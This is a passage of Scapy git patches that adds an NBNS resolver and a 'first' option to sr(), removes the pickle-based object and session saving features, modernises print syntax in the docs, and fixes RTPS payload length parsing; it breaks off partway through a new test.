import Ether, SourceMACField +# Typing imports +from typing import ( + List, + Union, +) + class NetBIOS_DS(Packet): name = "NetBIOS datagram service" @@ -398,6 +406,93 @@ def tcp_reassemble(cls, data, *args, **kwargs): bind_layers(TCP, NBTSession, dport=139, sport=139) +_nbns_cache = conf.netcache.new_cache("nbns_cache", 300) + + +@conf.commands.register +def nbns_resolve( + qname: str, + iface: Union[_GlobInterfaceType, List[_GlobInterfaceType]] = None, + raw: bool = False, + timeout: int = 3, + **kwargs, +) -> List[str]: + """ + Perform a simple NBNS (NetBios Name Services) resolution with caching + + :param qname: the name to query + :param iface: the interfaces to use. (default: all) + :param raw: return the whole netbios packet (default False) + :param timeout: seconds until timeout (per server) + :raise TimeoutError: if no DNS servers were reached in time. + """ + kwargs.setdefault("verbose", 0) + + # Unify types (for caching) + qname = NBNSQueryRequest.QUESTION_NAME.any2i(None, qname) + + # Check cache + cache_ident = qname + b"raw" if raw else b"" + result = _nbns_cache.get(cache_ident) + if result: + return result + + if iface is None: + ifaces = [ + x + for name, x in conf.ifaces.items() + if x.is_valid() and name != conf.loopback_name + ] + elif isinstance(iface, list): + ifaces = iface + else: + ifaces = [iface] + + # Builds a request for each broadcast address of each interface + requests = [] + for iface in ifaces: + for bdcst in conf.route.get_if_bcast(iface): + if bdcst == "255.255.255.255": + continue + requests.append( + IP(dst=bdcst) / + UDP() / + NBNSHeader() / + NBNSQueryRequest(QUESTION_NAME=qname) + ) + + if not requests: + return None + + # Perform requests, get the first response + try: + old_checkIPAddr = conf.checkIPaddr + conf.checkIPaddr = False + + res = sr1( + requests, + timeout=timeout, + first=True, + **kwargs, + ) + finally: + conf.checkIPaddr = old_checkIPAddr + + if res is not None: + if raw: + # Raw + result = res + else: + # Get IP + result = [x.NB_ADDRESS for x in res.ADDR_ENTRY] + if result: + # Cache it + _nbns_cache[cache_ident] = result + return result + else: + raise TimeoutError + + class NBNS_am(AnsweringMachine): function_name = "nbnsd" filter = "udp port 137" diff --git a/scapy/route.py b/scapy/route.py index 3c2227be834..52806488cfb 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -229,8 +229,11 @@ def route(self, dst=None, dev=None, verbose=conf.verb, _internal=False): def get_if_bcast(self, iff): # type: (str) -> List[str] + """ + Return the list of broadcast addresses of an interface. + """ bcast_list = [] - for net, msk, gw, iface, addr, metric in self.routes: + for net, msk, _, iface, _, _ in self.routes: if net == 0: continue # Ignore default route "0.0.0.0" elif msk == 0xffffffff: diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 94ab1ae30f8..ec74872418c 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -86,6 +86,7 @@ class debug: if negative, how many times to retry when no more packets are answered :param multi: whether to accept multiple answers for the same stimulus + :param first: stop after receiving the first response of any sent packet :param rcv_pks: if set, will be used instead of pks to receive packets. packets will still be sent through pks :param prebuild: pre-build the packets before starting to send them. @@ -125,6 +126,7 @@ def __init__(self, chainCC=False, # type: bool retry=0, # type: int multi=False, # type: bool + first=False, # type: bool rcv_pks=None, # type: Optional[SuperSocket] prebuild=False, # type: bool _flood=None, # type: Optional[_FloodGenerator] @@ -150,6 +152,7 @@ def __init__(self, self.chainCC = chainCC self.multi = multi self.timeout = timeout + self.first = first self.session = session self.chainEX = chainEX self.stop_filter = stop_filter @@ -254,7 +257,10 @@ def results(self): def _stop_sniffer_if_done(self) -> None: """Close the sniffer if all expected answers have been received""" - if self._send_done and self.noans >= self.notans and not self.multi: + if ( + self._send_done and self.noans >= self.notans and not self.multi or + self.first and self.noans + ): if self.sniffer and self.sniffer.running: self.sniffer.stop(join=False) From d1115ca69ee80ca6f719f731590d4f11576e9d99 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 1 Oct 2025 21:13:34 +0200 Subject: [PATCH 1561/1632] Object saving/loading removed --- doc/scapy/usage.rst | 35 ----------------------------------- scapy/utils.py | 38 +++----------------------------------- test/regression.uts | 17 ----------------- 3 files changed, 3 insertions(+), 87 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 1202d9cc400..ed3184f9494 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -991,41 +991,6 @@ We can reimport the produced binary string by selecting the appropriate first la \x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e \x1f !"#$%&\'()*+,-./01234567' |>>>> -Base64 -^^^^^^ - -Using the ``export_object()`` function, Scapy can export a base64 encoded Python data structure representing a packet:: - - >>> pkt - >>> - >>> export_object(pkt) - eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST - OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao - bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT - WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6 - ... - -The output above can be reimported back into Scapy using ``import_object()``:: - - >>> new_pkt = import_object() - eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST - OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao - bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT - WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6 - ... - >>> new_pkt - >>> - Sessions ^^^^^^^^ diff --git a/scapy/utils.py b/scapy/utils.py index e6a432e8477..9b7ad90537d 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -15,7 +15,6 @@ import argparse import array -import base64 import collections import decimal import difflib @@ -25,7 +24,6 @@ import locale import math import os -import pickle import random import re import shutil @@ -1221,39 +1219,9 @@ def __repr__(self): return "<%s>" % self.__dict__.get("name", self.__name__) -################### -# Object saving # -################### - - -def export_object(obj): - # type: (Any) -> None - import zlib - print(base64.b64encode(zlib.compress(pickle.dumps(obj, 2), 9)).decode()) - - -def import_object(obj=None): - # type: (Optional[str]) -> Any - import zlib - if obj is None: - obj = sys.stdin.read() - return pickle.loads(zlib.decompress(base64.b64decode(obj.strip()))) - - -def save_object(fname, obj): - # type: (str, Any) -> None - """Pickle a Python object""" - - fd = gzip.open(fname, "wb") - pickle.dump(obj, fd) - fd.close() - - -def load_object(fname): - # type: (str) -> Any - """unpickle a Python object""" - return pickle.load(gzip.open(fname, "rb")) - +################## +# Corrupt data # +################## @conf.commands.register def corrupt_bytes(data, p=0.01, n=None): diff --git a/test/regression.uts b/test/regression.uts index 97bba309ca8..cccb6b6b2f8 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -993,17 +993,6 @@ zerofree_randstring(4) in [b"\xd2\x12\xe4\x5b", b'\xd3\x8b\x13\x12'] = Test strand function assert strand(b"AC", b"BC") == b'@C' -= Test export_object and import_object functions -from unittest import mock -def test_export_import_object(): - with ContextManagerCaptureOutput() as cmco: - export_object(2807) - result_export_object = cmco.get_output(eval_bytes=True) - assert result_export_object.startswith("eNprYPL9zqUHAAdrAf8=") - assert import_object(result_export_object) == 2807 - -test_export_import_object() - = Test tex_escape function tex_escape("$#_") == "\\$\\#\\_" @@ -1024,12 +1013,6 @@ assert sane(corrupt_bytes("ABCDE", n=3)) in ["A.8D4", ".2.DE"] assert corrupt_bits("ABCDE") in [b"EBCDE", b"ABCDG"] assert sane(corrupt_bits("ABCDE", n=3)) in ["AF.EE", "QB.TE"] -= Test save_object and load_object functions -import tempfile -fd, fname = tempfile.mkstemp() -save_object(fname, 2807) -assert load_object(fname) == 2807 - = Test whois function ~ netaccess From 9c9251e6c16d5f3f3942e501316f6c85c36e463c Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 1 Oct 2025 21:22:18 +0200 Subject: [PATCH 1562/1632] Cache files extension --- scapy/data.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/data.py b/scapy/data.py index b6bff82e9ab..a9e16b1938f 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -302,7 +302,7 @@ def scapy_data_cache(name): if SCAPY_CACHE_FOLDER is None: # Cannot cache. return lambda x: x - cachepath = SCAPY_CACHE_FOLDER / name + cachepath = SCAPY_CACHE_FOLDER / (name + ".pickle") def _cached_loader(func, name=name): # type: (DecoratorCallable, str) -> DecoratorCallable From 13621d1145b3435e9d03caf20997107a84435c0b Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 1 Oct 2025 21:58:56 +0200 Subject: [PATCH 1563/1632] Sessions removed --- doc/scapy.1 | 8 +-- doc/scapy/usage.rst | 18 ----- scapy/main.py | 166 ++------------------------------------------ test/regression.uts | 67 +----------------- 4 files changed, 9 insertions(+), 250 deletions(-) diff --git a/doc/scapy.1 b/doc/scapy.1 index 395871a8849..4811055d459 100644 --- a/doc/scapy.1 +++ b/doc/scapy.1 @@ -17,10 +17,7 @@ arping, tcpdump, tshark, p0f, ... .PP \fBScapy\fP uses the Python interpreter as a command board. That means that you can use directly Python language (assign variables, use loops, -define functions, etc.) If you give a file a parameter when you run -\fBScapy\fP, your session (variables, functions, instances, ...) will be saved -when you leave the interpreter and restored the next time you launch -\fBScapy\fP. +define functions, etc.) .PP The idea is simple. Those kinds of tools do two things : sending packets and receiving answers. That's what \fBScapy\fP does : you define a set of @@ -48,9 +45,6 @@ header-less mode, also reduces verbosity. \fB\-d\fR increase log verbosity. Can be used many times. .TP -\fB\-s\fR FILE -use FILE to save/load session values (variables, functions, instances, ...) -.TP \fB\-p\fR PRESTART_FILE use PRESTART_FILE instead of $HOME/.config/scapy/prestart.py as pre-startup file .TP diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index ed3184f9494..9bb678a0849 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -991,24 +991,6 @@ We can reimport the produced binary string by selecting the appropriate first la \x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e \x1f !"#$%&\'()*+,-./01234567' |>>>> -Sessions -^^^^^^^^ - -At last Scapy is capable of saving all session variables using the ``save_session()`` function: - ->>> dir() -['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_raw', 'pkts'] ->>> save_session("session.scapy") - -Next time you start Scapy you can load the previous saved session using the ``load_session()`` command:: - - >>> dir() - ['__builtins__', 'conf'] - >>> load_session("session.scapy") - >>> dir() - ['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_raw', 'pkts'] - - Making tables ------------- diff --git a/scapy/main.py b/scapy/main.py index 663d5308b8c..990f27f4ba3 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -12,16 +12,13 @@ import code import getopt import glob -import gzip import importlib import io import logging import os import pathlib -import pickle import shutil import sys -import types import warnings from itertools import zip_longest @@ -260,7 +257,7 @@ def _validate_local(k): def _usage(): # type: () -> None print( - "Usage: scapy.py [-s sessionfile] [-c new_startup_file] " + "Usage: scapy.py [-c new_startup_file] " "[-p new_prestart_file] [-C] [-P] [-H]\n" "Args:\n" "\t-H: header-less start\n" @@ -494,116 +491,8 @@ def _scapy_exts(): return res -def save_session(fname="", session=None, pickleProto=-1): - # type: (str, Optional[Dict[str, Any]], int) -> None - """Save current Scapy session to the file specified in the fname arg. - - params: - - fname: file to save the scapy session in - - session: scapy session to use. If None, the console one will be used - - pickleProto: pickle proto version (default: -1 = latest)""" - from scapy import utils - from scapy.config import conf, ConfClass - if not fname: - fname = conf.session - if not fname: - conf.session = fname = utils.get_temp_file(keep=True) - log_interactive.info("Saving session into [%s]", fname) - - if not session: - if conf.interactive_shell in ["ipython", "ptipython"]: - from IPython import get_ipython - session = get_ipython().user_ns - else: - session = builtins.__dict__["scapy_session"] - - if not session: - log_interactive.error("No session found ?!") - return - - ignore = session.get("_scpybuiltins", []) - hard_ignore = ["scapy_session", "In", "Out", "open"] - to_be_saved = session.copy() - - for k in list(to_be_saved): - i = to_be_saved[k] - if k[0] == "_": - del to_be_saved[k] - elif hasattr(i, "__module__") and i.__module__.startswith("IPython"): - del to_be_saved[k] - elif isinstance(i, ConfClass): - del to_be_saved[k] - elif k in ignore or k in hard_ignore: - del to_be_saved[k] - elif isinstance(i, (type, types.ModuleType, types.FunctionType)): - if k[0] != "_": - log_interactive.warning("[%s] (%s) can't be saved.", k, type(i)) - del to_be_saved[k] - else: - try: - pickle.dumps(i) - except Exception: - log_interactive.warning("[%s] (%s) can't be saved.", k, type(i)) - - try: - os.rename(fname, fname + ".bak") - except OSError: - pass - - f = gzip.open(fname, "wb") - pickle.dump(to_be_saved, f, pickleProto) - f.close() - - -def load_session(fname=None): - # type: (Optional[Union[str, None]]) -> None - """Load current Scapy session from the file specified in the fname arg. - This will erase any existing session. - - params: - - fname: file to load the scapy session from""" - from scapy.config import conf - if fname is None: - fname = conf.session - try: - s = pickle.load(gzip.open(fname, "rb")) - except IOError: - try: - s = pickle.load(open(fname, "rb")) - except IOError: - # Raise "No such file exception" - raise - - scapy_session = builtins.__dict__["scapy_session"] - s.update({k: scapy_session[k] for k in scapy_session["_scpybuiltins"]}) - scapy_session.clear() - scapy_session.update(s) - update_ipython_session(scapy_session) - - log_loading.info("Loaded session [%s]", fname) - - -def update_session(fname=None): - # type: (Optional[Union[str, None]]) -> None - """Update current Scapy session from the file specified in the fname arg. - - params: - - fname: file to load the scapy session from""" - from scapy.config import conf - if fname is None: - fname = conf.session - try: - s = pickle.load(gzip.open(fname, "rb")) - except IOError: - s = pickle.load(open(fname, "rb")) - scapy_session = builtins.__dict__["scapy_session"] - scapy_session.update(s) - update_ipython_session(scapy_session) - - @overload -def init_session(session_name, # type: Optional[Union[str, None]] - mydict, # type: Optional[Union[Dict[str, Any], None]] +def init_session(mydict, # type: Optional[Union[Dict[str, Any], None]] ret, # type: Literal[True] ): # type: (...) -> Dict[str, Any] @@ -611,21 +500,18 @@ def init_session(session_name, # type: Optional[Union[str, None]] @overload -def init_session(session_name, # type: Optional[Union[str, None]] - mydict=None, # type: Optional[Union[Dict[str, Any], None]] +def init_session(mydict=None, # type: Optional[Union[Dict[str, Any], None]] ret=False, # type: Literal[False] ): # type: (...) -> None pass -def init_session(session_name, # type: Optional[Union[str, None]] - mydict=None, # type: Optional[Union[Dict[str, Any], None]] +def init_session(mydict=None, # type: Optional[Union[Dict[str, Any], None]] ret=False, # type: bool ): # type: (...) -> Union[Dict[str, Any], None] from scapy.config import conf - SESSION = {} # type: Optional[Dict[str, Any]] # Load Scapy scapy_builtins = _scapy_builtins() @@ -633,39 +519,7 @@ def init_session(session_name, # type: Optional[Union[str, None]] # Load exts scapy_builtins.update(_scapy_exts()) - if session_name: - try: - os.stat(session_name) - except OSError: - log_loading.info("New session [%s]", session_name) - else: - try: - try: - SESSION = pickle.load(gzip.open(session_name, "rb")) - except IOError: - SESSION = pickle.load(open(session_name, "rb")) - log_loading.info("Using existing session [%s]", session_name) - except ValueError: - msg = "Error opening Python3 pickled session on Python2 [%s]" - log_loading.error(msg, session_name) - except EOFError: - log_loading.error("Error opening session [%s]", session_name) - except AttributeError: - log_loading.error("Error opening session [%s]. " - "Attribute missing", session_name) - - if SESSION: - if "conf" in SESSION: - conf.configure(SESSION["conf"]) - conf.session = session_name - SESSION["conf"] = conf - else: - conf.session = session_name - else: - conf.session = session_name - SESSION = {"conf": conf} - else: - SESSION = {"conf": conf} + SESSION = {"conf": conf} # type: Dict[str, Any] SESSION.update(scapy_builtins) SESSION["_scpybuiltins"] = scapy_builtins.keys() @@ -678,6 +532,7 @@ def init_session(session_name, # type: Optional[Union[str, None]] return SESSION return None + ################ # Main # ################ @@ -810,8 +665,6 @@ def interact(mydict=None, STARTUP_FILE = DEFAULT_STARTUP_FILE PRESTART_FILE = DEFAULT_PRESTART_FILE - session_name = None - if argv is None: argv = sys.argv @@ -824,8 +677,6 @@ def interact(mydict=None, conf.fancy_banner = False conf.verb = 1 conf.logLevel = logging.WARNING - elif opt == "-s": - session_name = param elif opt == "-c": STARTUP_FILE = param elif opt == "-C": @@ -857,7 +708,7 @@ def interact(mydict=None, default=DEFAULT_PRESTART, ) - SESSION = init_session(session_name, mydict=mydict, ret=True) + SESSION = init_session(mydict=mydict, ret=True) if STARTUP_FILE: _read_config_file( @@ -1094,9 +945,6 @@ def ptpython_configure(repl): else: raise ValueError("Invalid conf.interactive_shell") - if conf.session: - save_session(conf.session, SESSION) - if __name__ == "__main__": interact() diff --git a/test/regression.uts b/test/regression.uts index cccb6b6b2f8..86b8c7f064b 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -625,72 +625,6 @@ try: except SystemExit: assert True -= Session test - -import builtins - -# This is automatic when using the console -def get_var(var): - return builtins.__dict__["scapy_session"][var] - -def set_var(var, value): - builtins.__dict__["scapy_session"][var] = value - -def del_var(var): - del builtins.__dict__["scapy_session"][var] - -init_session(None, {"init_value": 123}) -set_var("test_value", "8.8.8.8") # test_value = "8.8.8.8" -save_session() -del_var("test_value") -load_session() -update_session() -assert get_var("test_value") == "8.8.8.8" #test_value == "8.8.8.8" -assert get_var("init_value") == 123 - -= Session test with fname - -session_name = tempfile.mktemp() -init_session(session_name) -set_var("test_value", IP(dst="192.168.0.1")) # test_value = IP(dst="192.168.0.1") -save_session(fname="%s.dat" % session_name) -del_var("test_value") - -set_var("z", True) #z = True -load_session(fname="%s.dat" % session_name) -try: - get_var("z") - assert False -except: - pass - -set_var("z", False) #z = False -update_session(fname="%s.dat" % session_name) -assert get_var("test_value").dst == "192.168.0.1" #test_value.dst == "192.168.0.1" -assert not get_var("z") - -= Clear session files - -os.remove("%s.dat" % session_name) - -= Test temporary file creation -~ ci_only - -scapy_delete_temp_files() - -tmpfile = get_temp_file(autoext=".ut") -tmpfile -if WINDOWS: - assert "scapy" in tmpfile and "AppData\\Local\\Temp" in tmpfile -else: - import platform - BYPASS_TMP = platform.python_implementation().lower() == "pypy" or DARWIN - assert "scapy" in tmpfile and (BYPASS_TMP == True or "/tmp/" in tmpfile) - -assert conf.temp_files[0].endswith(".ut") -scapy_delete_temp_files() -assert len(conf.temp_files) == 0 - = Emulate interact() ~ interact @@ -2181,6 +2115,7 @@ p.show() = Variable creations from io import BytesIO +import base64 pcapfile = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00e\x00\x00\x00\xcf\xc5\xacVo*\n\x00(\x00\x00\x00(\x00\x00\x00E\x00\x00(\x00\x01\x00\x00@\x06|\xcd\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91|\x00\x00\xcf\xc5\xacV_-\n\x00\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x11|\xce\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x08\x01r\xcf\xc5\xacV\xf90\n\x00\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x01|\xde\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x00\xf7\xff\x00\x00\x00\x00') pcapngfile = BytesIO(b'\n\r\r\n\\\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x01\x00,\x00File created by merging: \nFile1: test.pcap \n\x04\x00\x08\x00mergecap\x00\x00\x00\x00\\\x00\x00\x00\x01\x00\x00\x00\\\x00\x00\x00e\x00\x00\x00\xff\xff\x00\x00\x02\x006\x00Unknown/not available in original file format(libpcap)\x00\x00\t\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\\\x00\x00\x00\x06\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x8d*\x05\x00/\xfc[\xcd(\x00\x00\x00(\x00\x00\x00E\x00\x00(\x00\x01\x00\x00@\x06|\xcd\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91|\x00\x00H\x00\x00\x00\x06\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x8d*\x05\x00\x1f\xff[\xcd\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x11|\xce\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x08\x01r<\x00\x00\x00\x06\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x8d*\x05\x00\xb9\x02\\\xcd\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x01|\xde\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x00\xf7\xff\x00\x00\x00\x00<\x00\x00\x00') pcapnanofile = BytesIO(b"M<\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00e\x00\x00\x00\xcf\xc5\xacV\xc9\xc1\xb5'(\x00\x00\x00(\x00\x00\x00E\x00\x00(\x00\x01\x00\x00@\x06|\xcd\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x91|\x00\x00\xcf\xc5\xacV-;\xc1'\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x11|\xce\x7f\x00\x00\x01\x7f\x00\x00\x01\x005\x005\x00\x08\x01r\xcf\xc5\xacV\x9aL\xcf'\x1c\x00\x00\x00\x1c\x00\x00\x00E\x00\x00\x1c\x00\x01\x00\x00@\x01|\xde\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x00\xf7\xff\x00\x00\x00\x00") From ef72e1db75172469eb1fffde6ee6c3206fee04d4 Mon Sep 17 00:00:00 2001 From: Julien Palard Date: Fri, 24 Oct 2025 22:42:21 +0200 Subject: [PATCH 1564/1632] Spotted some old prints in the documentation. --- doc/scapy/development.rst | 6 +++--- doc/scapy/usage.rst | 18 +++++++++--------- scapy/contrib/ppi_geotag.py | 2 +- scapy/layers/dot15d4.py | 2 +- scapy/layers/sctp.py | 6 +++--- 5 files changed, 17 insertions(+), 17 deletions(-) diff --git a/doc/scapy/development.rst b/doc/scapy/development.rst index 3c2fcda23d5..90df9807776 100644 --- a/doc/scapy/development.rst +++ b/doc/scapy/development.rst @@ -120,7 +120,7 @@ The generic format for a test campaign is shown in the following table:: * Comments for unit test 1 # Python statements follow a = 1 - print a + print(a) a == 1 @@ -196,7 +196,7 @@ Table 5 shows a simple test campaign with multiple tests set definitions. Additi = Unit Test 1 ~ test_set_1 simple a = 1 - print a + print(a) = Unit test 2 ~ test_set_1 simple @@ -234,7 +234,7 @@ Table 5 shows a simple test campaign with multiple tests set definitions. Additi = Unit Test 6 ~ test_set_2 hardest - print e + print(e) e == 1296 To see an example that is targeted to Scapy, go to http://www.secdev.org/projects/UTscapy. Cut and paste the example at the bottom of the page to the file ``demo_campaign.txt`` and run UTScapy against it:: diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 9bb678a0849..1795d1058e2 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -502,8 +502,8 @@ A TCP traceroute:: ***...... Received 33 packets, got 21 answers, remaining 1 packets >>> for snd,rcv in ans: - ... print snd.ttl, rcv.src, isinstance(rcv.payload, TCP) - ... + ... print(snd.ttl, rcv.src, isinstance(rcv.payload, TCP)) + ... 5 194.51.159.65 0 6 194.51.159.49 0 4 194.250.107.181 0 @@ -1644,7 +1644,7 @@ In this case we got 2 replies, so there were two active DHCP servers on the test We are only interested in the MAC and IP addresses of the replies: - >>> for p in ans: print p[1][Ether].src, p[1][IP].src + >>> for p in ans: print(p[1][Ether].src, p[1][IP].src) ... 00:de:ad:be:ef:00 192.168.1.1 00:11:11:22:22:33 192.168.1.11 @@ -1670,16 +1670,16 @@ Firewalking TTL decrementation after a filtering operation only not filtered packets generate an ICMP TTL exceeded - >>> ans, unans = sr(IP(dst="172.16.4.27", ttl=16)/TCP(dport=(1,1024))) - >>> for s,r in ans: - if r.haslayer(ICMP) and r.payload.type == 11: - print s.dport + >>> ans, unans = sr(IP(dst="172.16.4.27", ttl=16)/TCP(dport=(1,1024))) + >>> for s,r in ans: + ... if r.haslayer(ICMP) and r.payload.type == 11: + ... print(s.dport) Find subnets on a multi-NIC firewall only his own NIC’s IP are reachable with this TTL:: - >>> ans, unans = sr(IP(dst="172.16.5/24", ttl=15)/TCP()) - >>> for i in unans: print i.dst + >>> ans, unans = sr(IP(dst="172.16.5/24", ttl=15)/TCP()) + >>> for i in unans: print(i.dst) TCP Timestamp Filtering diff --git a/scapy/contrib/ppi_geotag.py b/scapy/contrib/ppi_geotag.py index 80e47f78769..6a704a16fa7 100644 --- a/scapy/contrib/ppi_geotag.py +++ b/scapy/contrib/ppi_geotag.py @@ -198,7 +198,7 @@ def any2i(self, pkt, x): pass else: y = x - # print "any2i: %s --> %s" % (str(x), str(y)) + # print("any2i: %s --> %s" % (str(x), str(y))) return y diff --git a/scapy/layers/dot15d4.py b/scapy/layers/dot15d4.py index 5854abff1a3..b83933de6ef 100644 --- a/scapy/layers/dot15d4.py +++ b/scapy/layers/dot15d4.py @@ -91,7 +91,7 @@ def lengthFromAddrMode(self, pkt, x): if pkttop.underlayer is None: break pkttop = pkttop.underlayer - # print "Underlayer field value of", x, "is", addrmode + # print("Underlayer field value of", x, "is", addrmode) if addrmode == 2: return 2 elif addrmode == 3: diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index b69d6c193ed..649ca59aa29 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -124,13 +124,13 @@ def crc32c(buf): def update_adler32(adler, buf): s1 = adler & 0xffff s2 = (adler >> 16) & 0xffff - print s1,s2 + print(s1, s2) for c in buf: - print orb(c) + print(orb(c)) s1 = (s1 + orb(c)) % BASE s2 = (s2 + s1) % BASE - print s1,s2 + print(s1, s2) return (s2 << 16) + s1 def sctp_checksum(buf): From dc266d52ffaa458d21be3c7047468ab1df48d572 Mon Sep 17 00:00:00 2001 From: Andrianov Roman Date: Sun, 2 Nov 2025 23:45:44 +0100 Subject: [PATCH 1565/1632] RTPS: Fix payload_len calculation for `DataPacket`. (#4545) Take into account size of `inlineQoS`. --- scapy/contrib/rtps/common_types.py | 3 +- scapy/contrib/rtps/rtps.py | 3 +- test/contrib/rtps.uts | 104 ++++++++++++++++++++++++++++- 3 files changed, 107 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/rtps/common_types.py b/scapy/contrib/rtps/common_types.py index 38913eff0b8..071c0903ed5 100644 --- a/scapy/contrib/rtps/common_types.py +++ b/scapy/contrib/rtps/common_types.py @@ -161,7 +161,8 @@ class SerializedDataField(StrLenField): class DataPacketField(EPacketField): def m2i(self, pkt, m): self.set_endianness(pkt) - pl_len = pkt.octetsToNextHeader - 24 + fld, val = pkt.getfield_and_val("inlineQoS") + pl_len = pkt.octetsToNextHeader - 24 - fld.i2len(pkt, val) _pkt = self.cls( m, endianness=self.endianness, diff --git a/scapy/contrib/rtps/rtps.py b/scapy/contrib/rtps/rtps.py index 134ff7c7b5a..dbdeba553ca 100644 --- a/scapy/contrib/rtps/rtps.py +++ b/scapy/contrib/rtps/rtps.py @@ -197,7 +197,8 @@ def __init__(self, *args, **kwargs): writer_entity_id_key = kwargs.pop("writer_entity_id_key", None) writer_entity_id_kind = kwargs.pop("writer_entity_id_kind", None) pl_len = kwargs.pop("pl_len", 0) - if writer_entity_id_key == 0x200 and writer_entity_id_kind == 0xC2: + if (writer_entity_id_key == 0x200 or writer_entity_id_key == 0x100) and \ + writer_entity_id_kind == 0xC2: DataPacket._pl_type = "ParticipantMessageData" else: DataPacket._pl_type = "SerializedData" diff --git a/test/contrib/rtps.uts b/test/contrib/rtps.uts index 50bb4b33612..806a5c64132 100644 --- a/test/contrib/rtps.uts +++ b/test/contrib/rtps.uts @@ -404,7 +404,6 @@ p1 = RTPS( ) assert p0.build() == d assert p1.build() == d -assert p1 == p0 + Test for pr #3914 = RTPS Heartbeat SequenceNumber_t packing and dissection @@ -476,3 +475,106 @@ p1 = RTPS( assert p0.build() == d assert p1.build() == d assert p0 == p1 + ++ Test for #PR4545 += RTPS length computation with inlineQos + +p0 = RTPS( + protocolVersion=ProtocolVersionPacket(major=2, minor=2), + vendorId=VendorIdPacket(vendor_id=0x010f), + guidPrefix=GUIDPrefixPacket( + hostId=0x010f45d2, appId=0xb3f558b9, instanceId=0x01000000 + ),magic=b"RTPS" + )/RTPSMessage(submessages=[ + RTPSSubMessage_INFO_TS( + submessageId=9, + submessageFlags=1, + octetsToNextHeader=8, + ts_seconds=1638425814, + ts_fraction=2083784982, + ), + RTPSSubMessage_DATA( + submessageId= 0x15, + submessageFlags= 0x7, + octetsToNextHeader= 54, + extraFlags= 0x0, + octetsToInlineQoS= 16, + readerEntityIdKey= 0x0, + readerEntityIdKind= 0x0, + writerEntityIdKey= 0x0, + writerEntityIdKind= 0x0, + writerSeqNumHi= 0, + writerSeqNumLow= 4, + inlineQoS= InlineQoSPacket( + parameters= 